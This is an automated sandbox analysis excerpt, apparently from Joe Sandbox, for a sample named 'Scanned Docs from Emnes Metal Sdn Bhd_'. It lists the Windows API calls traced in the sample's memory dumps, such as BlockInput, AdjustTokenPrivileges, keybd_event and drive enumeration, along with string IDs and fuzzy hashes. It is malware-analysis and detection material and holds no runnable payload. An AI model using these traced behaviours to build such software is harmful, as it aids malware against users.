                                                      • FindFirstFileW.KERNEL32(?,?), ref: 002F6918
                                                      • FindClose.KERNEL32(00000000), ref: 002F6961
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Find$CloseFileFirst
                                                      • String ID:
                                                      • API String ID: 2295610775-0
                                                      • Opcode ID: 5bc1d4819bd2a69a411133098cfd6b09dc62fcd2012e46c8b4830547b7122337
                                                      • Instruction ID: 5d59ed20f27a851f640ae147870089de6e5209ce85d8c710d793c22157ee877e
                                                      • Opcode Fuzzy Hash: 5bc1d4819bd2a69a411133098cfd6b09dc62fcd2012e46c8b4830547b7122337
                                                      • Instruction Fuzzy Hash: 1711D0356242019FD710DF29D488A26FBE4FF88328F14C6A9E5698F7A2C770EC15CB90
                                                      APIs
                                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00304891,?,?,00000035,?), ref: 002F37E4
                                                      • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00304891,?,?,00000035,?), ref: 002F37F4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ErrorFormatLastMessage
                                                      • String ID:
                                                      • API String ID: 3479602957-0
                                                      • Opcode ID: d7d7f48342faca3e187573aaa29c5355850d4a7dfc3d92ac828716d0491a3401
                                                      • Instruction ID: b0023d275d7e19b3fba211de42d903819f7d1c32d5bb406272fc2108bdcc2277
                                                      • Opcode Fuzzy Hash: d7d7f48342faca3e187573aaa29c5355850d4a7dfc3d92ac828716d0491a3401
                                                      • Instruction Fuzzy Hash: EBF0EC746153192AD72067655C4DFEB769DEFC9761F000175F505D2281D5A09944C7B0
                                                      APIs
                                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 002EB25D
                                                      • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 002EB270
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: InputSendkeybd_event
                                                      • String ID:
                                                      • API String ID: 3536248340-0
                                                      • Opcode ID: ccce61c69d0a08e752fc9a9a5fb04acd33fdefcf4120921ba02cfe49e578af28
                                                      • Instruction ID: 9aeaefbbdc3b380ba3d7c859c502ab5f780fcaf15d11306eb8955724a8cdf5cb
                                                      • Opcode Fuzzy Hash: ccce61c69d0a08e752fc9a9a5fb04acd33fdefcf4120921ba02cfe49e578af28
                                                      • Instruction Fuzzy Hash: 9DF01D7185428EABDB069FA1C805BEE7BB4FF08305F009009F955A5192C37986119F94
                                                      APIs
                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002E11FC), ref: 002E10D4
                                                      • CloseHandle.KERNEL32(?,?,002E11FC), ref: 002E10E9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                      • String ID:
                                                      • API String ID: 81990902-0
                                                      • Opcode ID: 990ce90f25ef599dd8503a5666895c76798cd4da43eea0660699d3d65dea70c4
                                                      • Instruction ID: 653e853e2c18ff43f0d10cf278122a0fa844f8a962a5fe757cb6bae5fdf870ff
                                                      • Opcode Fuzzy Hash: 990ce90f25ef599dd8503a5666895c76798cd4da43eea0660699d3d65dea70c4
                                                      • Instruction Fuzzy Hash: 63E0BF72064611AFEB662B51FD05EB777ADEB08310F24C82DF5A5804B1DB62ACA0DB50
                                                      APIs
                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,002B6766,?,?,00000008,?,?,002BFEFE,00000000), ref: 002B6998
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ExceptionRaise
                                                      • String ID:
                                                      • API String ID: 3997070919-0
                                                      • Opcode ID: 9c3cb4e75cb119733be5021889487b0b599e6a0a8161e4ef87d0da497d1ce878
                                                      • Instruction ID: 134dc9898d1b9a51e59d08131ba5c0fdcf6d73d60f8cccfa5f34e6adb457d32a
                                                      • Opcode Fuzzy Hash: 9c3cb4e75cb119733be5021889487b0b599e6a0a8161e4ef87d0da497d1ce878
                                                      • Instruction Fuzzy Hash: BDB16131520609DFDB15CF28C48ABA57BE0FF453A4F29C658E899CF2A1C739D9A5CB40
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID: 0-3916222277
                                                      • Opcode ID: 90e6706003c23c77b50f09d277170c006cfee5d1bfa27ece390ee85e27575d9e
                                                      • Instruction ID: 730f203d6285081aca24f9852ebda94901c87e0289dbcae9f4869d395d4d2c00
                                                      • Opcode Fuzzy Hash: 90e6706003c23c77b50f09d277170c006cfee5d1bfa27ece390ee85e27575d9e
                                                      • Instruction Fuzzy Hash: 88127D759202299BCF25CF58D9806EEB7B5FF48310F10819AE809EB251EB709E91DF90
                                                      APIs
                                                      • BlockInput.USER32(00000001), ref: 002FEABD
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: BlockInput
                                                      • String ID:
                                                      • API String ID: 3456056419-0
                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,002A03EE), ref: 002A09DA
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0
                                                      • API String ID: 0-4108050209
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0&5
                                                      • API String ID: 0-1313307525
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1659326696.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3200000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                      • Instruction ID: 92d74a4ccdc3e8433ba820ae587b81debb92f4fa25a4ef316e31a271554df131
                                                      • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                      • Instruction Fuzzy Hash: F641A271D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB50
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1659326696.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3200000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                      • Instruction ID: 12ac8341b21a0625ba93ee721f22865f89168ab972fd0f1cb91bad0284ce3bd7
                                                      • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                      • Instruction Fuzzy Hash: 14019278A14209EFCB48DF98C5909AEF7F5FB48310F248599D919AB741D730EE81DB90
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1659326696.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3200000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
Memory Dump Source
• Source File: 00000000.00000002.1659326696.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3200000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
APIs
• DeleteObject.GDI32(00000000), ref: 00302B30
• DeleteObject.GDI32(00000000), ref: 00302B43
• DestroyWindow.USER32 ref: 00302B52
• GetDesktopWindow.USER32 ref: 00302B6D
• GetWindowRect.USER32(00000000), ref: 00302B74
• SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00302CA3
• AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00302CB1
• CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00302CF8
• GetClientRect.USER32(00000000,?), ref: 00302D04
• CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00302D40
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00302D62
• GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00302D75
• GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00302D80
• GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00302D89
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00302D98
• GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00302DA1
• CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00302DA8
• GlobalFree.KERNEL32(00000000), ref: 00302DB3
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00302DC5
• OleLoadPicture.OLEAUT32(?,00000000,00000000,0031FC38,00000000), ref: 00302DDB
• GlobalFree.KERNEL32(00000000), ref: 00302DEB
• CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00302E11
• SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00302E30
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00302E52
• ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0030303F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
Similarity
• API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
• String ID: $AutoIt v3$DISPLAY$static
APIs
• SetTextColor.GDI32(?,00000000), ref: 0031712F
• GetSysColorBrush.USER32(0000000F), ref: 00317160
• GetSysColor.USER32(0000000F), ref: 0031716C
• SetBkColor.GDI32(?,000000FF), ref: 00317186
• SelectObject.GDI32(?,?), ref: 00317195
• InflateRect.USER32(?,000000FF,000000FF), ref: 003171C0
• GetSysColor.USER32(00000010), ref: 003171C8
• CreateSolidBrush.GDI32(00000000), ref: 003171CF
• FrameRect.USER32(?,?,00000000), ref: 003171DE
• DeleteObject.GDI32(00000000), ref: 003171E5
• InflateRect.USER32(?,000000FE,000000FE), ref: 00317230
• FillRect.USER32(?,?,?), ref: 00317262
• GetWindowLongW.USER32(?,000000F0), ref: 00317284
  • Part of subcall function 003173E8: GetSysColor.USER32(00000012), ref: 00317421
  • Part of subcall function 003173E8: SetTextColor.GDI32(?,?), ref: 00317425
  • Part of subcall function 003173E8: GetSysColorBrush.USER32(0000000F), ref: 0031743B
  • Part of subcall function 003173E8: GetSysColor.USER32(0000000F), ref: 00317446
  • Part of subcall function 003173E8: GetSysColor.USER32(00000011), ref: 00317463
  • Part of subcall function 003173E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00317471
  • Part of subcall function 003173E8: SelectObject.GDI32(?,00000000), ref: 00317482
  • Part of subcall function 003173E8: SetBkColor.GDI32(?,00000000), ref: 0031748B
  • Part of subcall function 003173E8: SelectObject.GDI32(?,?), ref: 00317498
  • Part of subcall function 003173E8: InflateRect.USER32(?,000000FF,000000FF), ref: 003174B7
  • Part of subcall function 003173E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003174CE
  • Part of subcall function 003173E8: GetWindowLongW.USER32(00000000,000000F0), ref: 003174DB
Memory Dump Source
• Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
Similarity
• API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
• String ID:
APIs
• DestroyWindow.USER32(?,?), ref: 00298E14
• SendMessageW.USER32(?,00001308,?,00000000), ref: 002D6AC5
• ImageList_Remove.COMCTL32(?,000000FF,?), ref: 002D6AFE
• MoveWindow.USER32(?,?,?,?,?,00000000), ref: 002D6F43
  • Part of subcall function 00298F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00298BE8,?,00000000,?,?,?,?,00298BBA,00000000,?), ref: 00298FC5
• SendMessageW.USER32(?,00001053), ref: 002D6F7F
• SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 002D6F96
• ImageList_Destroy.COMCTL32(00000000,?), ref: 002D6FAC
• ImageList_Destroy.COMCTL32(00000000,?), ref: 002D6FB7
Strings
Memory Dump Source
• Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
Similarity
• API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
• String ID: 0
APIs
• DestroyWindow.USER32(00000000), ref: 0030273E
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0030286A
• SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 003028A9
• AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 003028B9
• CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00302900
• GetClientRect.USER32(00000000,?), ref: 0030290C
• CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00302955
• CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00302964
• GetStockObject.GDI32(00000011), ref: 00302974
• SelectObject.GDI32(00000000,00000000), ref: 00302978
• GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00302988
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00302991
• DeleteDC.GDI32(00000000), ref: 0030299A
• CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 003029C6
• SendMessageW.USER32(00000030,00000000,00000001), ref: 003029DD
• CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00302A1D
• SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00302A31
• SendMessageW.USER32(00000404,00000001,00000000), ref: 00302A42
• CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00302A77
• GetStockObject.GDI32(00000011), ref: 00302A82
• SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00302A8D
• ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00302A97
Strings
Memory Dump Source
• Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
Similarity
• API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
• String ID: AutoIt v3$DISPLAY$msctls_progress32$static
APIs
• SetErrorMode.KERNEL32(00000001), ref: 002F4AED
• GetDriveTypeW.KERNEL32(?,0031CB68,?,\\.\,0031CC08), ref: 002F4BCA
• SetErrorMode.KERNEL32(00000000,0031CB68,?,\\.\,0031CC08), ref: 002F4D36
Strings
Memory Dump Source
• Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
Similarity
• API ID: ErrorMode$DriveType
• String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
APIs
• GetSysColor.USER32(00000012), ref: 00317421
• SetTextColor.GDI32(?,?), ref: 00317425
• GetSysColorBrush.USER32(0000000F), ref: 0031743B
• GetSysColor.USER32(0000000F), ref: 00317446
• CreateSolidBrush.GDI32(?), ref: 0031744B
• GetSysColor.USER32(00000011), ref: 00317463
• CreatePen.GDI32(00000000,00000001,00743C00), ref: 00317471
• SelectObject.GDI32(?,00000000), ref: 00317482
• SetBkColor.GDI32(?,00000000), ref: 0031748B
• SelectObject.GDI32(?,?), ref: 00317498
• InflateRect.USER32(?,000000FF,000000FF), ref: 003174B7
• RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003174CE
• GetWindowLongW.USER32(00000000,000000F0), ref: 003174DB
• SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0031752A
• GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00317554
• InflateRect.USER32(?,000000FD,000000FD), ref: 00317572
• DrawFocusRect.USER32(?,?), ref: 0031757D
• GetSysColor.USER32(00000011), ref: 0031758E
• SetTextColor.GDI32(?,00000000), ref: 00317596
• DrawTextW.USER32(?,003170F5,000000FF,?,00000000), ref: 003175A8
• SelectObject.GDI32(?,?), ref: 003175BF
• DeleteObject.GDI32(?), ref: 003175CA
• SelectObject.GDI32(?,?), ref: 003175D0
• DeleteObject.GDI32(?), ref: 003175D5
• SetTextColor.GDI32(?,?), ref: 003175DB
• SetBkColor.GDI32(?,?), ref: 003175E5
Memory Dump Source
• Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
Similarity
• API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
• String ID:
APIs
• GetCursorPos.USER32(?), ref: 00311128
• GetDesktopWindow.USER32 ref: 0031113D
• GetWindowRect.USER32(00000000), ref: 00311144
• GetWindowLongW.USER32(?,000000F0), ref: 00311199
• DestroyWindow.USER32(?), ref: 003111B9
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 003111ED
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0031120B
• SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0031121D
• SendMessageW.USER32(00000000,00000421,?,?), ref: 00311232
• SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00311245
• IsWindowVisible.USER32(00000000), ref: 003112A1
• SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 003112BC
• SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 003112D0
• GetWindowRect.USER32(00000000,?), ref: 003112E8
• MonitorFromPoint.USER32(?,?,00000002), ref: 0031130E
• GetMonitorInfoW.USER32(00000000,?), ref: 00311328
• CopyRect.USER32(?,?), ref: 0031133F
• SendMessageW.USER32(00000000,00000412,00000000), ref: 003113AA
Strings
Memory Dump Source
• Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                      • String ID: ($0$tooltips_class32
                                                      • API String ID: 698492251-4156429822
                                                      • Opcode ID: b7285bdcbb208d64200ceff74a6417ad365ad4c28e695f175dd249db6683a4d7
                                                      • Instruction ID: 902989e51edd21eff1c738cd5fa7c4ef5932c83387e8fafc4d7e3802fe43cb90
                                                      • Opcode Fuzzy Hash: b7285bdcbb208d64200ceff74a6417ad365ad4c28e695f175dd249db6683a4d7
                                                      • Instruction Fuzzy Hash: E5B18C71618341AFD705DF64C884BAABBE4FF89750F00891CFA999B2A1C771E885CF91
                                                      APIs
                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00298968
                                                      • GetSystemMetrics.USER32(00000007), ref: 00298970
                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0029899B
                                                      • GetSystemMetrics.USER32(00000008), ref: 002989A3
                                                      • GetSystemMetrics.USER32(00000004), ref: 002989C8
                                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 002989E5
                                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 002989F5
                                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00298A28
                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00298A3C
                                                      • GetClientRect.USER32(00000000,000000FF), ref: 00298A5A
                                                      • GetStockObject.GDI32(00000011), ref: 00298A76
                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00298A81
                                                        • Part of subcall function 0029912D: GetCursorPos.USER32(?), ref: 00299141
                                                        • Part of subcall function 0029912D: ScreenToClient.USER32(00000000,?), ref: 0029915E
                                                        • Part of subcall function 0029912D: GetAsyncKeyState.USER32(00000001), ref: 00299183
                                                        • Part of subcall function 0029912D: GetAsyncKeyState.USER32(00000002), ref: 0029919D
                                                      • SetTimer.USER32(00000000,00000000,00000028,002990FC), ref: 00298AA8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                      • String ID: AutoIt v3 GUI
                                                      • API String ID: 1458621304-248962490
